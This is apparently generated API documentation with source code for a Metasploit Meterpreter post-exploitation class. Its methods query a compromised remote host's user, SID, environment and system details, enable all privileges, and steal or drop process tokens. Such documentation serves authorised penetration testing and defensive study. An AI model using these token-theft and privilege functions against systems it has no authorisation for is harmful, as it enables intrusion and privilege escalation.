Class: Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config
- Inherits:
-
Object
- Object
- Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config
- Defined in:
- lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
Overview
This class provides access to remote system configuration and information.
Constant Summary collapse
- SYSTEM_SID =
'S-1-5-18'
Instance Method Summary collapse
-
#drop_token ⇒ Object
Drops any assumed token.
-
#getenv(var_name) ⇒ Object
Returns the value of a single requested environment variable name.
-
#getenvs(*var_names) ⇒ Object
Returns a hash of requested environment variables, along with their values.
-
#getprivs ⇒ Object
Enables all possible privileges.
-
#getsid ⇒ Object
Gets the SID of the current process/thread.
-
#getuid ⇒ Object
Returns the username that the remote side is running as.
-
#initialize(client) ⇒ Config
constructor
A new instance of Config.
-
#is_system? ⇒ Boolean
Determine if the current process/thread is running as SYSTEM.
-
#revert_to_self ⇒ Object
Calls RevertToSelf on the remote machine.
-
#steal_token(pid) ⇒ Object
Steals the primary token from a target process.
-
#sysinfo ⇒ Object
Returns a hash of information about the remote computer.
Constructor Details
#initialize(client) ⇒ Config
Returns a new instance of Config.
25 26 27 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 25 def initialize(client) self.client = client end |
Instance Method Details
#drop_token ⇒ Object
Drops any assumed token
122 123 124 125 126 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 122 def drop_token req = Packet.create_request('stdapi_sys_config_drop_token') res = client.send_request(req) client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) ) end |
#getenv(var_name) ⇒ Object
Returns the value of a single requested environment variable name
80 81 82 83 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 80 def getenv(var_name) _, value = getenvs(var_name).first value end |
#getenvs(*var_names) ⇒ Object
Returns a hash of requested environment variables, along with their values. If a requested value doesn’t exist in the response, then the value wasn’t found.
58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 58 def getenvs(*var_names) request = Packet.create_request('stdapi_sys_config_getenv') var_names.each do |v| request.add_tlv(TLV_TYPE_ENV_VARIABLE, v) end response = client.send_request(request) result = {} response.each(TLV_TYPE_ENV_GROUP) do |env| var_name = env.get_tlv_value(TLV_TYPE_ENV_VARIABLE) var_value = env.get_tlv_value(TLV_TYPE_ENV_VALUE) result[var_name] = var_value end result end |
#getprivs ⇒ Object
Enables all possible privileges
131 132 133 134 135 136 137 138 139 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 131 def getprivs req = Packet.create_request('stdapi_sys_config_getprivs') ret = [] res = client.send_request(req) res.each(TLV_TYPE_PRIVILEGE) do |p| ret << p.value end ret end |
#getsid ⇒ Object
Gets the SID of the current process/thread.
41 42 43 44 45 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 41 def getsid request = Packet.create_request('stdapi_sys_config_getsid') response = client.send_request(request) response.get_tlv_value(TLV_TYPE_SID) end |
#getuid ⇒ Object
Returns the username that the remote side is running as.
32 33 34 35 36 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 32 def getuid request = Packet.create_request('stdapi_sys_config_getuid') response = client.send_request(request) client.unicode_filter_encode( response.get_tlv_value(TLV_TYPE_USER_NAME) ) end |
#is_system? ⇒ Boolean
Determine if the current process/thread is running as SYSTEM
50 51 52 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 50 def is_system? getsid == SYSTEM_SID end |
#revert_to_self ⇒ Object
Calls RevertToSelf on the remote machine.
105 106 107 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 105 def revert_to_self client.send_request(Packet.create_request('stdapi_sys_config_rev2self')) end |
#steal_token(pid) ⇒ Object
Steals the primary token from a target process
112 113 114 115 116 117 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 112 def steal_token(pid) req = Packet.create_request('stdapi_sys_config_steal_token') req.add_tlv(TLV_TYPE_PID, pid.to_i) res = client.send_request(req) client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) ) end |
#sysinfo ⇒ Object
Returns a hash of information about the remote computer.
88 89 90 91 92 93 94 95 96 97 98 99 100 |
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 88 def sysinfo request = Packet.create_request('stdapi_sys_config_sysinfo') response = client.send_request(request) { 'Computer' => response.get_tlv_value(TLV_TYPE_COMPUTER_NAME), 'OS' => response.get_tlv_value(TLV_TYPE_OS_NAME), 'Architecture' => response.get_tlv_value(TLV_TYPE_ARCHITECTURE), 'System Language' => response.get_tlv_value(TLV_TYPE_LANG_SYSTEM), 'Domain' => response.get_tlv_value(TLV_TYPE_DOMAIN), 'Logged On Users' => response.get_tlv_value(TLV_TYPE_LOGGED_ON_USER_COUNT) } end |